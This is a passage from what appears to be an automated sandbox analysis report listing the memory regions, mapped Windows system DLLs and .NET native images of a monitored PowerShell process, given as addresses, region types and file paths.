0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 465 start_va = 0x2386b390000 end_va = 0x2386b5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b390000" filename = "" Region: id = 466 start_va = 0x7ff871bc0000 end_va = 0x7ff871c6cfff monitored = 0 entry_point = 0x7ff871bd81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 467 start_va = 0x7ff86e520000 end_va = 0x7ff86e707fff monitored = 0 entry_point = 0x7ff86e54ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 468 start_va = 0x2386b320000 end_va = 0x2386b32ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b320000" filename = "" Region: id = 469 start_va = 0x7ff65bdc0000 end_va = 0x7ff65bebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff65bdc0000" filename = "" Region: id = 470 start_va = 0x2386b390000 end_va = 0x2386b44dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 471 start_va = 0x2386b4c0000 end_va = 0x2386b5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b4c0000" filename = "" Region: id = 546 start_va = 0x7ff871b10000 end_va = 0x7ff871bb6fff monitored = 0 entry_point = 0x7ff871b258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 547 start_va = 0x7ff86f210000 end_va = 0x7ff86f2acfff monitored = 0 entry_point = 0x7ff86f2178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 548 start_va = 0xafa4280000 end_va = 0xafa42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4280000" filename = "" Region: id = 549 start_va = 0x7ff86f5b0000 end_va = 0x7ff86f60afff monitored = 0 entry_point = 0x7ff86f5c38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 550 start_va = 0x7ff870fd0000 end_va = 0x7ff8710ebfff monitored = 0 entry_point = 0x7ff8710102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 551 start_va = 0x7ff871860000 end_va = 0x7ff8719a2fff monitored = 0 entry_point = 0x7ff871888210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 552 start_va = 0x7ff86f2b0000 end_va = 0x7ff86f52cfff monitored = 0 entry_point = 0x7ff86f384970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 553 start_va = 0x7ff86e4b0000 end_va = 0x7ff86e519fff monitored = 0 entry_point = 0x7ff86e4e6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 554 start_va = 0x2386b330000 end_va = 0x2386b336fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b330000" filename = "" Region: id = 555 start_va = 0x7ff871c70000 end_va = 0x7ff871df5fff monitored = 0 entry_point = 0x7ff871cbffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 556 start_va = 0x7ff8719b0000 end_va = 0x7ff871b05fff monitored = 0 entry_point = 0x7ff8719ba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 557 start_va = 0x7ff8710f0000 end_va = 0x7ff8711b0fff monitored = 0 entry_point = 0x7ff871110da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 558 start_va = 0x7ff863f00000 end_va = 0x7ff863f1dfff monitored = 0 entry_point = 0x7ff863f03a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 559 start_va = 0x7ff8598b0000 end_va = 0x7ff859917fff monitored = 1 entry_point = 0x7ff8598b4970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 560 start_va = 0x2386b5c0000 end_va = 0x2386b6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b5c0000" filename = "" Region: id = 561 start_va = 0x2386b450000 end_va = 0x2386b456fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b450000" filename = "" Region: id = 562 start_va = 0x2386b460000 end_va = 0x2386b498fff monitored = 0 entry_point = 0x2386b4612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 563 start_va = 0x2386b6d0000 end_va = 0x2386b857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b6d0000" filename = "" Region: id = 564 start_va = 0x7ff8711c0000 end_va = 0x7ff8711fafff monitored = 0 entry_point = 0x7ff8711c12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 565 start_va = 0x2386b860000 end_va = 0x2386b9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b860000" filename = "" Region: id = 566 start_va = 0x2386b9f0000 end_va = 0x2386cdeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b9f0000" filename = "" Region: id = 567 start_va = 0x2386b460000 end_va = 0x2386b462fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 568 start_va = 0x2386b470000 end_va = 0x2386b470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b470000" filename = "" Region: id = 569 start_va = 0x2386b480000 end_va = 0x2386b480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b480000" filename = "" Region: id = 570 start_va = 0x2386cdf0000 end_va = 0x2386cf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cdf0000" filename = "" Region: id = 571 start_va = 0x2386b490000 end_va = 0x2386b496fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b490000" filename = "" Region: id = 572 start_va = 0x2386cfa0000 end_va = 0x2386d2d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 573 start_va = 0x7ff859810000 end_va = 0x7ff8598acfff monitored = 1 entry_point = 0x7ff859811010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 574 start_va = 0x7ff86f550000 end_va = 0x7ff86f5a1fff monitored = 0 entry_point = 0x7ff86f55f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 575 start_va = 0x7ff86e490000 end_va = 0x7ff86e49efff monitored = 0 entry_point = 0x7ff86e493210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 576 start_va = 0x7ff86cc60000 end_va = 0x7ff86cc69fff monitored = 0 entry_point = 0x7ff86cc61350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 577 start_va = 0x7ff854c40000 end_va = 0x7ff855625fff monitored = 1 entry_point = 0x7ff854c45b60 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 578 start_va = 0x7ff8595b0000 end_va = 0x7ff8596a6fff monitored = 0 entry_point = 0x7ff8595d4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 579 start_va = 0x2386b4a0000 end_va = 0x2386b4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b4a0000" filename = "" Region: id = 580 start_va = 0x2386b4b0000 end_va = 0x2386b4bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b4b0000" filename = "" Region: id = 581 start_va = 0x2386b5c0000 end_va = 0x2386b5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b5c0000" filename = "" Region: id = 582 start_va = 0x2386b6c0000 end_va = 0x2386b6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b6c0000" filename = "" Region: id = 583 start_va = 0x7ff7f5540000 end_va = 0x7ff7f554ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5540000" filename = "" Region: id = 584 start_va = 0x7ff7f5550000 end_va = 0x7ff7f555ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5550000" filename = "" Region: id = 585 start_va = 0x7ff7f5560000 end_va = 0x7ff7f55effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5560000" filename = "" Region: id = 586 start_va = 0x7ff7f55f0000 end_va = 0x7ff7f565ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f55f0000" filename = "" Region: id = 587 start_va = 0x2386b5d0000 end_va = 0x2386b5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b5d0000" filename = "" Region: id = 588 start_va = 0x2386b5e0000 end_va = 0x2386b5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b5e0000" filename = "" Region: id = 589 start_va = 0x2386d2e0000 end_va = 0x2386d48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d2e0000" filename = "" Region: id = 590 start_va = 0x2386cdf0000 end_va = 0x2386cf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cdf0000" filename = "" Region: id = 591 start_va = 0x2386cf90000 end_va = 0x2386cf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf90000" filename = "" Region: id = 592 start_va = 0xafa4300000 end_va = 0xafa437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4300000" filename = "" Region: id = 593 start_va = 0x2386b5f0000 end_va = 0x2386b5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b5f0000" filename = "" Region: id = 594 start_va = 0x23800000000 end_va = 0x23817ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000023800000000" filename = "" Region: id = 595 start_va = 0x2386b5f0000 end_va = 0x2386b65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b5f0000" filename = "" Region: id = 596 start_va = 0x2386cdf0000 end_va = 0x2386cef9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cdf0000" filename = "" Region: id = 597 start_va = 0x2386cf10000 end_va = 0x2386cf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386cf10000" filename = "" Region: id = 598 start_va = 0xafa4380000 end_va = 0xafa43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4380000" filename = "" Region: id = 599 start_va = 0x7ff853750000 end_va = 0x7ff854c37fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\f89061884b75dab0e3967d7221e5290d\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\f89061884b75dab0e3967d7221e5290d\\mscorlib.ni.dll") Region: id = 600 start_va = 0x7ff65bd20000 end_va = 0x7ff65bdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff65bd20000" filename = "" Region: id = 601 start_va = 0x7ff65bd10000 end_va = 0x7ff65bd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff65bd10000" filename = "" Region: id = 602 start_va = 0x2386b660000 end_va = 0x2386b66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b660000" filename = "" Region: id = 603 start_va = 0x2386d2e0000 end_va = 0x2386d3bcfff monitored = 0 entry_point = 0x2386d33e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 604 start_va = 0x2386d480000 end_va = 0x2386d48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d480000" filename = "" Region: id = 605 start_va = 0x2386d2e0000 end_va = 0x2386d3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d2e0000" filename = "" Region: id = 606 start_va = 0x2386b670000 end_va = 0x2386b67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b670000" filename = "" Region: id = 607 start_va = 0x7ff852b00000 end_va = 0x7ff853743fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\60b77585c8aa9cfd1b30a64092c81041\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\60b77585c8aa9cfd1b30a64092c81041\\system.ni.dll") Region: id = 608 start_va = 0x7ff852170000 end_va = 0x7ff852af1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\d1da4b8a843ec63bb8be25f8202bedc1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\d1da4b8a843ec63bb8be25f8202bedc1\\system.core.ni.dll") Region: id = 609 start_va = 0x7ff859760000 end_va = 0x7ff85980bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\a98ebc5c36f6700560e2c198cb74a21e\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.pb378ec07#\\a98ebc5c36f6700560e2c198cb74a21e\\microsoft.powershell.consolehost.ni.dll") Region: id = 610 start_va = 0x7ff86dda0000 end_va = 0x7ff86ddb6fff monitored = 0 entry_point = 0x7ff86dda79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 611 start_va = 0x7ff86da30000 end_va = 0x7ff86da63fff monitored = 0 entry_point = 0x7ff86da4ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 612 start_va = 0x7ff86e2b0000 end_va = 0x7ff86e2d8fff monitored = 0 entry_point = 0x7ff86e2c4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 613 start_va = 0x7ff86dec0000 end_va = 0x7ff86decafff monitored = 0 entry_point = 0x7ff86dec19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 614 start_va = 0x7ff7f5660000 end_va = 0x7ff7f569ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5660000" filename = "" Region: id = 615 start_va = 0x7ff7f56a0000 end_va = 0x7ff7f56affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f56a0000" filename = "" Region: id = 616 start_va = 0x7ff850160000 end_va = 0x7ff85216efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\c5788d802ee1c43bd2595d4bd8068373\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\c5788d802ee1c43bd2595d4bd8068373\\system.management.automation.ni.dll") Region: id = 617 start_va = 0x2386cf20000 end_va = 0x2386cf81fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 618 start_va = 0x2386b680000 end_va = 0x2386b684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 619 start_va = 0x2386b690000 end_va = 0x2386b69ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 620 start_va = 0x7ff870f50000 end_va = 0x7ff870f57fff monitored = 0 entry_point = 0x7ff870f510b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 621 start_va = 0x7ff7f56b0000 end_va = 0x7ff7f56bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f56b0000" filename = "" Region: id = 622 start_va = 0x7ff8594c0000 end_va = 0x7ff85950ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\0b78453b55fd5a9dd4227b840b3c26ab\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\0b78453b55fd5a9dd4227b840b3c26ab\\system.numerics.ni.dll") Region: id = 623 start_va = 0x7ff859420000 end_va = 0x7ff8594bbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\a85ca0608e46590b3c5efc58b708c91d\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\a85ca0608e46590b3c5efc58b708c91d\\microsoft.management.infrastructure.ni.dll") Region: id = 624 start_va = 0x7ff84f8b0000 end_va = 0x7ff850155fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c2f35cb9621b8ca33a05759bbb0683c1\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c2f35cb9621b8ca33a05759bbb0683c1\\system.xml.ni.dll") Region: id = 625 start_va = 0x7ff8592b0000 end_va = 0x7ff859411fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\4e86c0566600de46fccb2961b7fbe310\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\4e86c0566600de46fccb2961b7fbe310\\system.directoryservices.ni.dll") Region: id = 626 start_va = 0x7ff859150000 end_va = 0x7ff8592aefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\2b17cdd44210c6b182c3804d228caba4\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\2b17cdd44210c6b182c3804d228caba4\\system.management.ni.dll") Region: id = 627 start_va = 0x7ff7f56c0000 end_va = 0x7ff7f56cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f56c0000" filename = "" Region: id = 628 start_va = 0x7ff7f56d0000 end_va = 0x7ff7f56dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f56d0000" filename = "" Region: id = 629 start_va = 0x7ff7f56e0000 end_va = 0x7ff7f56effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f56e0000" filename = "" Region: id = 630 start_va = 0x7ff7f56f0000 end_va = 0x7ff7f56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f56f0000" filename = "" Region: id = 631 start_va = 0x7ff7f5700000 end_va = 0x7ff7f570ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5700000" filename = "" Region: id = 632 start_va = 0x7ff7f5710000 end_va = 0x7ff7f571ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5710000" filename = "" Region: id = 633 start_va = 0x7ff7f5720000 end_va = 0x7ff7f572ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5720000" filename = "" Region: id = 634 start_va = 0x7ff7f5730000 end_va = 0x7ff7f573ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5730000" filename = "" Region: id = 635 start_va = 0x7ff7f5740000 end_va = 0x7ff7f574ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5740000" filename = "" Region: id = 636 start_va = 0x7ff7f5750000 end_va = 0x7ff7f575ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5750000" filename = "" Region: id = 637 start_va = 0x7ff7f5760000 end_va = 0x7ff7f576ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5760000" filename = "" Region: id = 638 start_va = 0x7ff7f5770000 end_va = 0x7ff7f577ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5770000" filename = "" Region: id = 639 start_va = 0x7ff7f5780000 end_va = 0x7ff7f578ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5780000" filename = "" Region: id = 640 start_va = 0x7ff867ad0000 end_va = 0x7ff867afbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\44fe61ba9d3d7a07f59d4d61b684745f\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\44fe61ba9d3d7a07f59d4d61b684745f\\system.configuration.install.ni.dll") Region: id = 641 start_va = 0x7ff855f20000 end_va = 0x7ff855ff7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\ed6d04a18216e12e72d7813b2a427519\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\ed6d04a18216e12e72d7813b2a427519\\system.transactions.ni.dll") Region: id = 642 start_va = 0x7ff865de0000 end_va = 0x7ff865e2efff monitored = 1 entry_point = 0x7ff865e001ae region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 643 start_va = 0x2386d2e0000 end_va = 0x2386d32bfff monitored = 1 entry_point = 0x2386d3001ae region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 644 start_va = 0x2386d3e0000 end_va = 0x2386d3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386d3e0000" filename = "" Region: id = 645 start_va = 0x7ff7f5790000 end_va = 0x7ff7f579ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff7f5790000" filename = "" Region: id = 646 start_va = 0x7ff86cbf0000 end_va = 0x7ff86cbf4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.diagnostics.tracing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\8076609d42bb39dd02decd6175250122\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\8076609d42bb39dd02decd6175250122\\system.diagnostics.tracing.ni.dll") Region: id = 647 start_va = 0x7ff86f9f0000 end_va = 0x7ff870f4efff monitored = 0 entry_point = 0x7ff86fb511f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 648 start_va = 0x7ff86f130000 end_va = 0x7ff86f172fff monitored = 0 entry_point = 0x7ff86f144b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 649 start_va = 0x7ff86e990000 end_va = 0x7ff86efd3fff monitored = 0 entry_point = 0x7ff86eb564b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 650 start_va = 0x7ff86f070000 end_va = 0x7ff86f124fff monitored = 0 entry_point = 0x7ff86f0b22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 651 start_va = 0x7ff86e420000 end_va = 0x7ff86e46afff monitored = 0 entry_point = 0x7ff86e4235f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 652 start_va = 0x7ff86e470000 end_va = 0x7ff86e483fff monitored = 0 entry_point = 0x7ff86e4752e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 653 start_va = 0x2386b6a0000 end_va = 0x2386b6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b6a0000" filename = "" Region: id = 654 start_va = 0x2386b6b0000 end_va = 0x2386b6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 655 start_va = 0x2386b6b0000 end_va = 0x2386b6b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 656 start_va = 0x2386b6b0000 end_va = 0x2386b6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 657 start_va = 0x2386b6b0000 end_va = 0x2386b6b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 658 start_va = 0x2386b6b0000 end_va = 0x2386b6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 659 start_va = 0x2386b6b0000 end_va = 0x2386b6b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 660 start_va = 0xafa4400000 end_va = 0xafa447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4400000" filename = "" Region: id = 661 start_va = 0xafa4480000 end_va = 0xafa44fffff monitored = 1 